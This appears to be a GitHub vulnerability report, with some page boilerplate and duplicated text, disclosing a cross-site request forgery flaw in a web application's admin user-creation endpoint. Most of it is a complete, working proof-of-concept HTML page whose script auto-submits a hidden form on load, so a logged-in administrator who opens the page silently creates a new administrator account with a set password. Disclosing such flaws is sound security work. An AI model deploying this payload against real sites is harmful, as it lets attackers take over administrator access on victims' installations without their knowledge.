After the administrator loged in, open the page containing the following code. An administrator account will be added automatically.
(please replace "http://tp.im" in "url" with the domain name you set.)
The text was updated successfully, but these errors were encountered:
yundiao
changed the title
I found a CSRF vulnerability to add an administrator
I found a CSRF vulnerability that can add the administrator account
Mar 25, 2019
After the administrator loged in, open the page containing the following code. An administrator account will be added automatically.
(please replace "http://tp.im" in "url" with the domain name you set.)
<html><body><script type="text/javascript">function post(url, fields){var p = document.createElement("form");p.action = url;p.innerHTML = fields;p.target = "_self";p.method = "post";document.body.appendChild(p);p.submit();}function csrf_hack(){var fields;fields += " <input type=\"hidden\" name=\"user_login\" value=\"CSRFadministrator\" />";fields += " <input type=\"hidden\" name=\"user_pass\" value=\"admin1234\" />";fields += " <input type=\"hidden\" name=\"user_email\" value=\"456@bing.com\" />";fields += " <input type=\"hidden\" name=\"role_id[]\" value=\"1\" />";var url = "http://tp.im/admin/user/addpost.html";post(url, fields);}window.onload = function(){csrf_hack();}</script></body></html>The text was updated successfully, but these errors were encountered: